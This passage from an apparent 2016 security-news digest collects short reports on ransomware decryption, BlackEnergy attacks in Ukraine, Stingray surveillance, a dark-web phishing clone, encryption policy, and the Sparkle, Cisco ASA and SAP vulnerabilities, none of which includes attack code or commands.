Conspiracy to commit unauthorised access with intent to commit further offences contrary to Section 2 Computer Misuse Act 1990.
Conspiracy to commit unauthorised acts with intent to impair or with recklessness as to the impairing operation of a computer contrary to Section 3 Computer Misuse Act 1990.
Accused Teen: Authorities Ruining My Life
The unit declined to provide any further information on the arrest, but while speaking to Motherboard, the arrested teenager denied being Cracka, saying "I am not who you think I am ;) ;) ;)"
"I am innocent until proven guilty so I have nothing to be worried about," the teen said. "They are trying to ruin my life."
Neither the Department of Justice (DoJ) nor the FBI have yet responded to comment on it.
Nasdaq to Use Bitcoin-style Blockchain to Record Shareholder Votes
13.2.2016 IT
The Nasdaq stock exchange and the Republic of Estonia have announced the use of Blockchain-based technology to allow shareholders of companies to e-vote in shareholder meetings even when they're abroad, according to Nasdaq's press release.
Global stock market giant is developing an electronic shareholder voting system implemented on the top of Blockchain technology that underpins Bitcoins.
Blockchain – the public and decentralized ledger technology underpins all Bitcoin transactions and logs each transfer of an asset in an encrypted "block" that is added to a permanent, transparent chain showing every deal associated with that asset.
Even some of the world's major banks are also considering the adoption of the Blockchain technology.
In the mid of last year, 9 of the World's renowned Banks, including JPMorgan, Royal Bank of Scotland, Goldman Sachs and Barclays, collaborated with New York-based financial tech firm R3 to create a new framework based on Blockchain.
Now, according to Nasdaq, shareholders of the companies listed on the Nasdaq OMX Tallinn Stock Exchange and other Estonian e-residents called "e-Estonians" will now be able to more frequently participate in voting processes without being physically present at a shareholder meeting.
Here's Why Blockchain Technology:
Estonia provides e-Residency that is a transnational digital identity available to people who start businesses online in the nation.
But if these individuals own stock in an Estonian publicly listed company, they are required to physically present or nominate someone else in the shareholder meetings to vote, which is quite a painful process.
However, by using a Blockchain technology a user would be given a so-called private key (a unique long number), assuring they are listed on the e-Residency records held by the Estonian government.
This record will then be sealed on the Blockchain and cannot be altered or tampered with. Now, this private key would be required by you to validate yourself whenever you go to vote in a shareholders meeting online.
So, this would allow the companies and e-Estonians to know for sure that the person voting online is the actual person they say they are.
This is not the first time Nasdaq is deploying Blockchain technology. Nasdaq is already using its own blockchain system, The Nasdaq Linq, that allows private securities issuance between an investor and company.
Nasdaq hopes to complete this blockchain project sometime in 2016.
Here's How to Decrypt Hydracrypt & Umbrecrypt Ransomware Files
13.2.2016 Virus
Over the last few years, we have seen several types of Ransomware malware that demand a whopping amount of money from users for the retrieval of their locked, compromised sensitive files.
We have also witnessed the birth of decryption solution for some of the Ransomware like Cryptolocker (partial), Coinvault, Rescue Kit.
One more solution has recently been released for decryption of newly emerging ransomware, dubbed as Hydracrypt and Umbrecrypt that are propagated through Angler Exploit Kit.
Both of the malware belong to CrypBoss ransomware family.
The source code of CrypBoss Ransomware was leaked last year on Pastebin, which was later analyzed by Fabian Wosar, a security researcher at Emsisoft.
With the help of CrypBoss Source code, Wosar was successfully able to crack the encryption algorithm of the ransomware and quickly made the decryption tool for CrypBoss and its variants (Hydracrypt and Umbrecrypt).
It is found that both Hydracrypt and Umbrecrypt share the same genealogy which got traced back to CrypBoss Ransomware with small modifications in the implementation by its authors.
"Unfortunately the changes made by the HydraCrypt and UmbreCrypt authors cause up to 15 bytes at the end of the file to be damaged irrecoverably" Wosar stated.
The damaged bytes in the encrypted files are trivial (in most of the cases) since it would be used as a buffer data or some trailing bytes, which could easily be re-build by using any file repairing tool (for those 15 bytes).
This doesn't affect much of the decryption process as 99 percent of the files are retrieved without any harm using the released decryptor tool that is available Free to download.
How to Decrypt Ransomware Files?
Double clicking the decryptor executable would initialize the decryption process, and you would get the key once the task gets completed. The time taken to crack the encryption would also depend upon your system's Flip-Flop power.
Once the decryption key is generated, it is better to save it as a hard copy (by writing down in the paper). Now you can run the decryptor tool and select the intended folders to get unlocked. Enter the key once the decryptor tool prompts for it.
To avoid a hotch-potch, users are advised to:
Run the decryptor for a small number of files initially to check whether the decryption procedure is being executed properly.
This would deliver the file ensurity and saves your time.
Make sure whether enough space is present in the hard-drive, so as to take place the decryption.
How to Ensure your Decrypted Data is Legit?
Here's How to Decrypt Hydracrypt & Umbrecrypt Ransomware Files
However, the security team also stated that the result of the Decryption might not be correct as the ransomware, unfortunately, does not leave any information about the original file behind.
To ensure the proper file recovery, initially you have to select the encrypted file along with its original version (somewhere in your cloud or anywhere) and pass it to the decryptor executable by a simple drag-and-drop.
[Note: If you haven't found such, then users can also get a random encrypted file and a random PNG image off the Internet.]
If the resultant output is legit, then you can carry out the same task with the remaining files. As the same algorithm is being followed in the remaining encrypted files, then you would get your files back as normal.
BlackEnergy infected also Ukrainian Mining and Railway Systems
13.2.2016 APT
Experts at Trend Micro discovered strains of BlackEnergy malware involved in the recent attacks against Ukrainian Mining and Railway Systems.
BlackEnergy was in the headlines when the security industry examined the power outage occurred in Ukraine in December 2015.
The BlackEnergy malware is a threat improved to target SCADA systems, the latest variant includes the KillDisk component developed to wipe the disks and make systems inoperable.
The Ukrainian government accused Russia of being involved in the attack that caused the power outages, but further analysis revealed that the BlackEnergy malware was not directly responsible for the outages.
Now Trend Micro announced that have spotted BlackEnergy and KillDisk samples on the systems of a Ukrainian mining company and a major railway operator.
The experts noticed that the systems at the mining company were also infected with multiple variants of KillDisk, these samples implements the same features observed in the KillDisk component that infected the power utilities in Ukraine.
The security researchers believe that the threat actors behind them is the same that targeted the Ukrainian power companies.
The researchers noticed many similarities between the samples, naming conventions, control infrastructure, and the timing of the attacks.
TrendMicro spotted several samples similar to the BlackEnergy variant that infected the Ukrainian power utility, the malware used the same command and control (C&C) servers.
“Like the attacks against the Ukrainian mining company, we also witnessed KillDisk possibly being used against a large Ukrainian railway company that is part of the national Ukrainian railway system. The file tsk.exe (SHA1: f3e41eb94c4d72a98cd743bbb02d248f510ad925) was flagged as KillDisk and used in the electric utility attack as well as against the rail company. This appears to be the only spillover from the Ukrainian power utility infection. However, we have no proof showing that BlackEnergy was present on the railway systems, it could be assumed that it was likely present somewhere in their network.” states a blog post published by Trend Micro.
The experts elaborated several theories about the attack, one of the most plausible is the offensive of a politically motivated persistent attacker that intends to hit Ukrainian critical infrastructure to destabilize the country.
“One is that the attackers may have wanted to destabilize Ukraine through a massive or persistent disruption involving power, mining, and transportation facilities,” Wilhoit said. “Another possibility is that they have deployed the malware to different critical infrastructure systems to determine which one is the easiest to infiltrate and subsequently wrestle control over. A related theory is that the infections in the mining and train companies may have just been preliminary infections, where the attackers are just attempting to test the code base.”
Whichever is the case, cyber attacks against critical infrastructures represent a serious threat against any government.
Microsoft Edge's InPrivate Mode Finally Keeps Your Activity Private
12.2.2016 Safety
Microsoft Edge's InPrivate Mode Finally Keeps Your Activity Private
Browsing the Web in 'Private Mode' is not as private as you think.
Microsoft has patched the Private Browsing Leakage bug in its newest Edge browser with the latest update.
When we talk about Browsers, only one thing which does not strike our mind is Internet Explorer or IE.
Even there were some trolls on Internet Explorer (IE) waving over the social medias such as "The best web browser to download other browsers."
In fact, it was justified as everyone downloads a new browser with IE in their newly installed Operating System.
Due to the continual taunts, Microsoft had scrapped the entire IE and made a new browser called "Edge Browser" (Codenamed "Spartan").
Edge was shipped as the default browser (along with IE) with Windows 10 devices and grabbed the attention of many eye pupils as it included all the features that other mainstream browsers have.
Well, History Repeats Itself
In January this year, it was reported that 'InPrivate' mode of the Edge browser is leaking users' web browsing data.
The InPrivate mode is nothing but Incognito or private support for Windows 10. It has been found storing your browsing history, cookies and cache in a WebCache file on the system, which could be found easily.
Precisely here:
\Users\user_name\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
This issue made users feel a repulsive force again and they instantly switched back to other browsers like Firefox or Chrome as the protocols of private browsing mode was correctly followed.
The reported vulnerability was fixed which was included in the update KB 3135174.
The patch update listed as "Fixed issue with Microsoft Edge browser caching visited URLs while using InPrivate browsing."
Microsoft: Windows 10, Edge So Secure They Don't Need EMET
In another statement made by Microsoft, the company officially claimed that its Edge Browser is much more secure than any other browsers and does not need the support of any armour like EMET anymore.
Enhanced Mitigation Experience Toolkit (EMET) is a Windows tool that shields against the execution of software vulnerabilities in Windows Environment.
As of now, Windows had buried a security hole, but let's see what's more coming from the same family.
New York Police Used Cell Phone Spying Tool Over 1000 Times Without Warrant
12.2.2016 Mobil
The New York Police Department (NYPD) has admitted that it used controversial cell phone spying tool "Stingrays" more than 1,000 times since 2008 without warrants.
In the documents obtained by the New York Civil Liberties Union (NYCLU), the NYPD acknowledged that the department has used Stingrays to intercept personal communications and track the locations of nearby mobile phone users.
What are Stingrays?
In my previous article, I have explained the scope of Stingrays along with its working, how it cracks encryption and how the police agencies are using these cell phone spying devices equipped in its military surveillance technology DRTBox in order to:
Track people
Intercept thousands of cellphone calls
Quietly eavesdrop on conversations
Eavesdrop on emails and text messages
Stingrays are small cell phone surveillance devices that work by imitating cellphone towers, forcing all nearby phones to connect to them and revealing the owners' locations. These devices are small enough to be mounted on a plane.
The organization disclosed on Thursday that the NYPD has not obtained a proper warrant before using the cell phone spying device, instead obtained a "pen register order" from a lower-level court, typically used to collect phone call data for a specific mobile phone.
Moreover, the NYPD also does not have any written policy guidelines for Stingrays use. According to the NYCLU, this is the first time the nation's largest police agency has confirmed to using the controversial surveillance technology.
NY Police Used Stingrays 1,016 Times
While Stingrays were most commonly used for serious investigation purposes – like kidnapping, drug trafficking, rape, homicide, assault – the NY Police was also using these devices for investigating money laundering and ID theft.
The police records show that the department used Stingray 1,016 times between 2008 and May 2015, which indicates that the police have been largely relying on Stingrays surveillance and violating the privacy of New Yorkers.
"If carrying a cell phone means being exposed to military-grade surveillance equipment, then the privacy of nearly all New Yorkers is at risk," NYCLU executive director Donna Lieberman says.
"Considering the NYPD's troubling history of surveilling innocent people, it must at the very least establish strict privacy policies and obtain warrants [before] using intrusive equipment like Stingrays that can track people's cell phones."
Warrantless Surveillance
Last year, both the Department of Justice (DoJ) and the Department of Homeland Security (DHS) announced a policy that required the FBI and other federal authorities to obtain a proper court warrant before deploying these tracking devices.
Moreover, some states, including California, also passed a law that requires a court warrant for the use of Stingrays, DirtBoxes and similar tracking devices.
Still, these notorious spying devices continue to be used without warrants and the knowledge of citizens. The NYCLU suggests the departments change its policy "at a minimum" that requires officers to obtain a warrant prior to deploying such devices.
However, in response to this report, the NYPD is justifying itself by saying that they had used the surveillance technology in emergency situations in which the life or safety of someone was at risk and that too after applying for a court order and consulting a District Attorney.
A replica of AlphaBay market used to steal login credentials
12.2.2016 Incindent
Fraudsters operating on the AlphaBay darknet market have deployed a replica of the popular marketplace to steal login credentials from peers.
Paul Mutton, security experts at Netcraft, discovered a fake version of the Alphabay Market (pwoah7foa6au2pul.onion), one of the most popular black markets hosted in the dark web.
Paul Mutton speculates that fraudsters have deployed the fake version of the Alphabay Market in an attempt to steal login credentials.
“Fraudsters operating on the AlphaBay darknet market are using phishing attacks to steal login credentials from other criminals. In this particular attack, the phishing site mimics the address of one of AlphaBay’s Tor hidden services.” wrote Mutton.
AlphaBay is today one of the most interesting black markets, it offers any kind of illegal products and services. It emerged in 2014 following the seizure down of Silk Road, it was founded by members of Russian carding forum and today it is the most important black market for payment card frauds.
The fake website mimics the login page of the Alphabay black market, including the CAPTCHA protection mechanism.
When Alphabay users login to the bogus website are redirected to the legitimate AlphaBay Market.
In order to replicate the legitimate website it was necessary to reproduce also the .onion address that is associated to the hidden service. This address is derived from the public key used to authenticate the connection, this means that it is very difficult to convincingly impersonate the site without having access to the owner’s key pair.
Fraudsters have computed a partial match using tools such as scallion and generate a similar address like pwoah7f5ivq74fmp.onion.
“However, in the case of this phishing attack, the fraudster has simply created a lookalike domain on the public internet, using the address pwoah7foa6au2pul.me.pn.” wrote Mutton.
“This phishing attack makes use of a me.pn domain, which was likely chosen because addresses under this domain can be registered for free, and the “.me.pn” string bears a (somewhat tenuous) similarity to the .onion TLD, at least in terms of its length.”
As explained by Mutton, this phishing attack is another example of fraudsters defrauding fraudsters.
It’s obvious that similar attacks represents a threat only for new users who are deceived by the replica, meanwhile AlphaBay veteran members will never fall victim of such kind of attack.
The FBI requests $38 Million to counter the threat of Going Dark
12.2.2016 Crime
The FBI requests $38 Million to counter the threat of Going Dark, in particular asking more economic resources to break encryption when needed.
The FBI Director James Comey has highlighted in different occasions the difficulties faced by law enforcement when dealing with encryption during their investigations.
Now, the FBI is making its request for budget for the next year, in particular asking more economic resources to break encryption when needed.
Giving a look at the FBI’s Fiscal Year 2017 Budget Request document it is possible to find a specific session titled “Going Dark” that reports the following text:
“Going Dark: $38.3 million and 0 positions The requested funding will counter the threat of Going Dark, which includes the inability to access data because of challenges related to encryption, mobility, anonymization, and more. The FBI will develop and acquire tools for electronic device analysis, cryptanalytic capability, and forensic tools. Current services for this initiative are 39 positions (11 agents) and 31.0 million.”
The FBI asked for $38.3 more million on top of the $31 million already requested in 2015 (a total of $69.3 million) to improve its capabilities to get encrypted data and de-anonymize Internet users.
These numbers demonstrate a significant effort of law enforcement to overwhelm the “going dark” problem.
In December, the FBI’s Director James Comey called for tech companies currently providing users with end-to-end encryption to review “their business model” and stop implementing it.
The end-to-end encryption allows users to communicate securely on the internet making impossible for law enforcement to eavesdrop the traffic.
The IT giants implemented the end-to-end encryption in response to the disconcerting revelations of the NSA whistleblower Edward Snowden about mass surveillance operated by the US Government.
FBI director-James-Comey-img-103113 encryption Going Dark
“FBI Director James Comey on Wednesday called for tech companies currently offering end-to-end encryption to reconsider their business model, and instead adopt encryption techniques that allow them to intercept and turn over communications to law enforcement when necessary.” reported The Intercept.
In the past, the FBI’s Director James Comey already requested IT giants to insert a backdoor in their product to allow law enforcement to decrypt data, but the reply of the companies was negative.
The US authorities have been pressuring companies like Apple and Google in public hearings to provide law enforcement access to decrypted communications whenever there’s a lawful request.
Given the negative response of the IT companies, it is normal that the FBI and intelligence agencies will opt for hacking techniques to break encryption.
“The days of reliable wiretaps are vanishing. [Hacking] is the next best thing for the FBI,” Christopher Soghoian, the principal technologist at the American Civil Liberties Union, told to Lorenzo Bicchierai from MotherBoard.
It is likely the FBI will spend that money to buy hacking tools, including spyware and zero-day exploits, for its investigations.
“38.3 million dollars buys a hell of a lot of malware and zero-day exploits,” added Soghoian.
The FBI already used hacking techniques during its investigations, in particular to de-anonymize criminals on the dark web. A few weeks ago emerged more details on the operation conducted against TorMail in 2013.
Hey, Apple User! Check If You are also Affected by the Sparkle Vulnerability
12.2.2016 Apple
A pair of new security vulnerabilities has been discovered in the framework used by a wide variety of Mac apps leaves them open to Man-in-the-Middle (MitM) attacks.
The framework in question is Sparkle that a large number of third-party OS X apps, including Camtasia, uTorrent, Duet Display and Sketch, use to facilitate automatic updates in the background.
Sparkle is an open source software available on GitHub under the permissive MIT license by the Sparkle Project with the help of numerous of valuable contributors. The framework supports Mac OS X versions 10.7 through 10.11 and Xcode 5.0 through 7.0.
The Sparkle vulnerabilities, discovered by Radek, a security researcher, in late January and reported by Ars reporter, affect Apple Mac apps that use:
An outdated and vulnerable version of the Sparkle updater framework.
An unencrypted HTTP channel to receive info from update servers.
What's the Issue?
The first loophole is due to the improper implementation of Sparkle Updater framework by the app developers.
The app developers are using an unencrypted HTTP URL to check for new updates, rather than an SSL encrypted channel.
As a result, an attacker in the same network could perform MitM attacks and inject malicious code into the communication between the end user and the server, potentially allowing an attacker to gain full control of your computer.
Video Proof-of-Concept Attack
You can watch the proof-of-concept (PoC) attack video that shows a working attack conducted against a vulnerable version of the Sequel Pro app:
Another proof-of-concept attack was shared by fellow researcher Simone Margaritelli using an older version of VLC Media Player, which has now been updated to patch the vulnerability.
Margaritelli showed how he exploited the flaw on a fully patched Mac running a then-latest version of VLC media player using a technique that streamlines the attack by letting it work with the Metasploit exploit framework.
Another less severe bug in Sparkle has also been discovered by Radek that could be exploited against poorly configured update servers, potentially allowing an attacker to replace an update file with a malicious one.
sparkle-vulnerability
The Sparkle vulnerabilities affected both Mac OS X Yosemite and the most recent version of OS X El Capitan.
Who's Affected?
The Sparkle vulnerabilities affects third-party apps outside of the Mac App Store, which is downloaded from the Internet manually by the user and uses an outdated version of the Sparkle.
Although the actual number of affected apps is not known, Radek estimated the number could be "huge."
Among the affected apps are uTorrent (version 1.8.7), Camtasia 2 (version 2.10.4), Sketch (version 3.5.1), and DuetDisplay (version 1.5.2.4).
Check if You're Affected
Check this list of apps that use Sparkle Updater framework. If you have installed any of these apps on your Apple Mac, you could probably be at risk of being hacked.
Note: Not all of the listed apps communicate over unencrypted HTTP channels or use an outdated version of the framework.
How to Protect Yourself against the Issues?
Although Sparkle has provided a fix for both the vulnerabilities in the newest version of the Sparkle Updater, it is not so easy to install the patch.
Radek warns in an email that the major problem is that developers who created their apps are required to update Sparkle framework inside their apps, which is not trivial.
As the update process requires a developer to:
Download the latest version of Sparkle Updater
Check if the latest version of Sparkle is compatible with their app
Create some test cases, verify update and others
Address this security issue and publish new version of their app
Once this completes, users can check for the app update and download the newest version of the particular app on their computers.
Until this is done, users who are not sure if an app on their computers is safe should avoid unsecured Wi-Fi networks or, alternatively, use a Virtual Private Network (VPN).
In the meanwhile, if you get a prompt for an app update, rather than updating the app via the update window itself, simply visit the app's official website and download the latest version from there, just to make sure that you’re downloading what you actually intend to.
US Intelligence confirms the ISIS used chemical weapons
12.2.2016 Hacking
According to Fox News, the Director of National Intelligence confirmed to the Senate that the Islamic State has used chemical weapons.
In December, a European Parliament report warned that the ISIS organization has already smuggled CBRN material into the EU, the risk of WMD attacks is real.
The intelligence experts speculate the IS has recruited experts with chemistry, physics and computer science degrees to wage attacks with weapons of mass destruction.
“ISIS actually has already acquired the knowledge, and in some cases the human expertise, that would allow it to use CBRN materials as weapons of terror.” said Wolfgang Rudischhauser, Director of the Weapons of Mass Destruction Non-Proliferation Centre at NATO.
The shocking revelation is included in a report of the European Parliament that confirm the ISIS “may be planning to try to use internationally banned weapons of mass destruction in future attacks.”
According to Fox News, the Director of National Intelligence James Clapper confirmed to the Senate on Tuesday that the Islamic State has used weapons of mass destruction (WMDs).
The Islamic State group has used chemical weapons on the battlefield, Clapper did not provide info where WDMs had been used, but he confirmed that in many cases members of the ISIS have used the threaded weapons.
“(The Syrian government) has used chemicals against the opposition on multiple occasions since Syria joined the Chemical Weapons Convention. ISIL has also used toxic chemicals in Iraq and Syria, including the blister agent sulfur mustard,” he stated.
Fox News already published images and videos demonstrating the member of the ISIS were testing chemical weapons. The images showed burns and blistering on
“Photos taken by the Kurds in northern Iraq last summer and fall and reviewed by Fox News show burns and blistering on the skin that a source on the ground there said are consistent with the use of chemical agents. The agents were described as “odorless, colorless and absorbed through the clothing,” causing burns or illness hours later.” wrote FoxNews.
This is the first official confirmation from the US intelligence community that members of the Islamic State have used WMDs. The fear of a possible attack in Europe or US is high, a chemical weapon deployed in a city could kill thousands of unarmed citizens.
isis chemical weapons
“The perceived success of attacks by homegrown violent extremists in Europe and North America, such as those in Chattanooga and San Bernardino, might motivate others to replicate opportunistic attacks with little or no warning, diminishing our ability to detect terrorist operational planning and readiness,” he stated.
The availability of Chemical weapons definitely raises the level of danger of the threat from the radical group.
Once again identity thieves use stolen SSNs in IRS attack
12.2.2016 Computer Attack
The IRS detected roughly unauthorized attempts using 464,000 unique SSNs, and 101,000 attempts allowed crooks in generating PINs.
The U.S. Internal Revenue Service (IRS) recently confirmed that cyber criminals abused the Electronic Filing PIN application.
The Electronic Filing PIN application is running on irs.gov and allows taxpayers to generate a PIN that they can use to file tax returns online. The information necessary to obtain this PIN is the name, date of birth, mailing address and of course, the SSN.
Unfortunately, for identity thieves is quite easy to obtain SSNs online from the dumps resulting from the numerous data breaches occurred in the last months.
SSN numbers, for example, along with other PII are easy to acquire in the various black markets, data breaches of Anthem and CareFirst have made available on the market data related to million customers.
The criminals use this information with an automated bot that is able to generate PINs for the E-File service. In January, the Internal Revenue Service detected roughly unauthorized attempts using 464,000 unique SSNs, and the bad news is that 101,000 attempts allowed crooks in generating PINs.
The agency highlighted that its systems were not breached and no taxpayer data has been exposed.
“The IRS recently identified and halted an automated attack upon its Electronic Filing PIN application on IRS.gov. Using personal data stolen elsewhere outside the IRS, identity thieves used malware in an attempt to generate E-file PINs for stolen social security numbers. An E-file pin is used in some instances to electronically file a tax return.” the IRS said in a statement. “No personal taxpayer data was compromised or disclosed by IRS systems.”
“IRS cybersecurity experts are currently assessing the situation, and the IRS is working closely with other agencies and the Treasury Inspector General for Tax Administration. The IRS also is sharing information with its Security Summit state and industry partners,”
The tax agency already notified the users that have been impacted, it sent an email to inform that their accounts have been secured against tax-related identity theft.
A similar incident occurred in May 2015 when the Internal Revenue Service’s Get Transcript system was accessed by unauthorized parties using stolen information.
More than 100,000 taxpayers were impacted by unauthorized accesses, meanwhile the total number of accounts breached exceeded 300,000.
Deep Web Search Engines to Explore the Hidden Internet
11.2.2016 Safety
Do you know: There is a vast section of the Internet which is hidden and not accessible through regular search engines and web browsers.
This part of the Internet is known as the Deep Web, and it is about 500 times the size of the Web that we know.
What is DEEP WEB?
Deep Web is referred to the data which are not indexed by any standard search engine such as Google or Yahoo.
The 'Deep Web' refers to all web pages that search engines cannot find, such as user databases, registration-required web forums, webmail pages, and pages behind paywalls.
Then, there's the Dark Web or Dark Net – a specific part of that hidden Deep Web.
Deep Web and Dark Web are the intriguing topics for the Netizens all around. But when you hear the term 'Deep Web' or 'Dark Web,' you usually categorize them into one.
If yes, then you are wrong.
What is DARK WEB?
Dark Web is where you can operate without been tracked, maintaining total anonymity.
The Dark Web is much smaller than the Deep Web and is made up of all different kinds of websites that sell drugs, weapons and even hire assassins.
These are hidden networks avoiding their presence on the Surface Web, and its URLs are tailed up with .onion.
These [websitename].onion domains are not indexed by regular search engines, so you can only access Dark Web with special software -- called 'The Onion Browser,' referred to as TOR.
TOR is free, and anyone can download it.
Many of us heard about the Dark Web when the largest online underground marketplace Silk Road was taken down following an investigation by United States federal authorities.
But, what if, you can still be able to dig the Darknet contents with your regular browsers, without the need of TOR?
Here's How to Surf & Search the Deep Web without TOR
Solution: Deep Web Search Engines
Search engines like Google are incredibly powerful, but they can't crawl and index the vast amount of data that is not hyperlinked or accessed via public DNS services.
However, there are Deep Web Search Engines that crawl over the TOR network and bring the same result to your regular browser.
Some of such Dark Web Search Engines are:
Onion.City
Onion.to
Not Evil
Memex Deep Web Search Engine
Here are some Deep Web Search Engines:
The WWW Virtual Library
Collection of Deep Web Research Tools
Surfwax
IceRocket
Stumpedia
Freebase
TechDeepWeb
These Deep Web search engines talks to the onion service via Tor and relays, resolve the .onion links and then deliver the final output to your regular browser on the ordinary World Wide Web.
However, there is one consequence of browsing Deep or Dark Web on a regular browser. Working this way will make these .onion search results visible to you, me, and also, for Google.
Moreover, tracker-less search engines are also popular in the TOR culture – like Disconnect, DDG, IXQuick – which ensures your privacy searches.
Importance of TOR
It is worth noting that mere access via TOR is not considered as an illegal practice but can arouse suspicion with the law.
TOR has long been used by Journalists, Researchers, or Thrill seekers in heavily censored countries in order to hide their web browsing habits and physical location, crawl the Deep Web and exchange information anonymously.
However, one of the main reasons behind the rise of TOR is NSA's Surveillance Programs.
After the Assange-Snowden revelations in the past years, public fears about their privacy getting compromised over the Internet.
The reliability of the Internet had been lost that demanded the Ciphers come into action to thwart the Federal Agency's efforts. So comes the need of TOR.
With the help of TOR, the web users could roam around the Internet beyond any fear, keeping themselves and their real identities hidden from federal and intelligent agencies.
This is why TOR is being one of the favorite targets of federal agencies.
Since Tor has long been a target of the government intelligence agencies, most online users do not feel safe to use Tor anymore.
To known how easy it is for government agencies to unmask Tor users, you can read these articles:
How Spies Could Unmask Tor Users without Cracking Encryption
How Hacking Team and FBI planned to Unmask A Tor User
Who lurks in the 'Dark Web'?
According to the recent survey conducted by researchers Daniel Moore and Thomas Rid (in their book Cryptopolitik and the Darknet), it is found that 57% of the Dark Web is occupied by unauthorized contents like Pornography, Illicit Finances, Drug Hub, Weapon Trafficking, counterfeit currency flow and many more.
The netizens had given the shade of illegalities to Dark Web. This is why today Dark Web is being defined as something that is illegal instead of a 'Pool of Information.'
However, there are countless reasons to use Dark Web. But, ultimately, it depends on the surfer what to surf?
Sidelining Darkweb for criminal offenses often gray out the legitimate purposes inside Dark Web.
In the end, I just want to say:
Knowledge is Free! Happy Surfing!
ENCRYPT Act of 2016 — Proposed Bill Restricts States to Ban Encryption
11.2.2016 Security
The last year's ISIS-linked terror attacks in Paris and California has sparked debate on Encryption, and the intelligent agencies started reviving their efforts to weaken encryption on various encrypted products and services.
But, there is some Good News!
California Congressman and Texas Republican are now challenging state-level proposals to restrict US citizens' ability to encrypt their smartphones.
On Wednesday, California Congressman Ted Lieu, one of four members of Congress, and Texas Republican Blake Farenthold, a member of the House Oversight and House Judiciary committees, introduced a new bill in Congress that…
…attempts to ban states efforts to implement their own anti-encryption policies at a state level while a national debate on Encryption is ongoing.
The bill, called "Ensuring National Constitutional Rights for Your Private Telecommunications Act of 2016" – in short, "ENCRYPT Act of 2016" – would stop states from individually trying to make major companies change their technology to fulfil law enforcement requirements.
The bill comes almost a month after two state bills in California and New York proposed to ban the sale of smartphones equipped with strong cryptography that cannot be unlocked and accessed by the manufacturer.
ENCRYPT ACT of 2016
Here's what the "ENCRYPT Act of 2016" reads [PDF]:
A State or political subdivision of a State may not order or request that a manufacturer, seller, developer, or provider of covered products or services:
Design, alter or modify the security features in its product or service in an effort to allow the surveillance of its users, or to allow the physical search of such product or service by any federal agency or instrumentality of a State, a political subdivision of a State, or, of course, the United States.
Have the ability to decrypt or otherwise provide intelligible information that is encrypted or otherwise rendered unintelligible using its product or service.
Although the privacy advocates have largely applauded the new bill, it would need to pass both the House of Representatives as well as the Senate, and signed by the President in order to take effect.
However, many federal officers, including FBI Director James Comey, would not be so happy with the proposed bill, as they forced major companies to provide backdoor access to their services.
As Comey previously stressed, "There're plenty of companies today that [offer] secure services to their customers and still comply with court orders. There are plenty of folks who make good phones [and can] unlock them in response to a court order."
But in my opinion, no backdoors can help law enforcement, and intelligence agencies tackle terrorism.
Would Handing Over a Backdoor to the Federal Agencies Help?
As I previously said, "Technically, there is no such backdoor that only the government can access. If surveillance tools can exploit the vulnerability by design, then an attacker who gained access to it would enjoy the same privilege."
Even if these backdoors are not creating vulnerabilities for hackers to attack, we do not trust the government asking for backdoor encryption keys.
Recently Department of Justice or DoJ got hacked by an unknown hacker who leaked personal data belonging to roughly 20,000 FBI agents and 9,000 DHS employees on Monday.
A similar thing happened last year when the US Office of Personnel Management (OPM) got hacked multiple times, exposing extremely sensitive security records of over 21.5 Million government employees.
These incidents prove that the government agencies fail to protect its most sensitive data, so can't be trusted to keep these backdoor encryption keys safe from hackers.
Million CISCO ASA Firewalls potentially vulnerable to attacks
11.2.2016 Vulnerebility
A flaw in Cisco ASA Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code.
It’s a bad period for IT manufacturers, recently the security community has discovered serious and anomalous vulnerabilities affecting popular products like Juniper equipment and Fortinet Forti OS firewalls.
Now, it is now the turn of Cisco, the product line Cisco ASA firewall, a family of devices that is offered for sale as an appliance, blades or even virtual systems.
The Cisco ASA Adaptive Security Appliance is an IP router that acts as an application-aware firewall, network antivirus, intrusion prevention system, and virtual private network (VPN) server.
The part of this that is most pressing is that Cisco claims that there are over a million of these deployed.
Security experts David Barksdale, Jordan Gruskovnjak, and Alex Wheeler of Exodus Intelligence have discovered a critical buffer overflow vulnerability (CVE-2016-1287) that received a CVSS (Common Vulnerability Scoring System) score of 10.
“The algorithm for re-assembling IKE payloads fragmented with the Cisco fragmentation protocol contains a bounds-checking flaw that allows a heap buffer to be overflowed with attacker-controlled data. A sequence of payloads with carefully chosen parameters causes a buffer of insufficient size to be allocated in the heap which is then overflowed when fragment payloads are copied into the buffer. Attackers can use this vulnerability to execute arbitrary code on affected devices.” is the summary published by Exodus Intel.
It is quite easy for an attacker to exploit the vulnerability in CISCO ASA by sending crafted UDP packets to the vulnerable system. An exploit could allow the attacker to obtain full control of the system
The impact is serious considering that over a million of CISCO ASA firewall has been already deployed worldwide.
“A vulnerability in the Internet Key Exchange (IKE) version 1 (v1) and IKE version 2 (v2) code of Cisco ASA Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the Advisory published by CISCO.
“The vulnerability is due to a buffer overflow in the affected code area. An attacker could exploit this vulnerability by sending crafted UDP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system.”
Which are the affected devices?
The Cisco ASA Software running on the following products may be affected by this vulnerability:
Cisco ASA 5500 Series Adaptive Security Appliances
Cisco ASA 5500-X Series Next-Generation Firewalls
Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Cisco ASA 1000V Cloud Firewall
Cisco Adaptive Security Virtual Appliance (ASAv)
Cisco Firepower 9300 ASA Security Module
Cisco ISA 3000 Industrial Security Appliance
If you have one of them patch it as soon as possible.
SAP fixed a flaw in xMII that could open the door to nation-state hackers
10.2.2016 Vulnerebility
SAP fixed a vulnerability affecting SAP MII can be used as a starting point of multi-stage attacks aiming to get control over plant devices and manufacturing systems.
SAP fixed a critical vulnerability in its application that could be exploited by hackers, especially nation-state actors, to compromise industrial manufacturing software. SAP issued a critical software update that patched 23 security vulnerabilities, one of them affecting the SAP Manufacturing Integration and Intelligence (xMII).
The SAP Manufacturing Integration and Intelligence (xMII) solution implements a sort of software hub that connects ERP software (Enterprise Resource Planning) and other enterprise applications with plant floor and Operational Technology devices (OT).
This specific SAP solution is widely adopted in the energy industry that is known to be a privileged target for state-sponsored hackers.
SAP published a SAP Security Notes February 2016 – Review and also a summary docs that contains the information on the Patch Day Security Notes that are released on second Tuesday of every month and fix flaws in SAP solutions.
According to data provided by SAP, most of the fixed holes affects SAP NetWeaver’s J2EE application security, meanwhile Cross Site Scripting represents the principal vulnerability type.
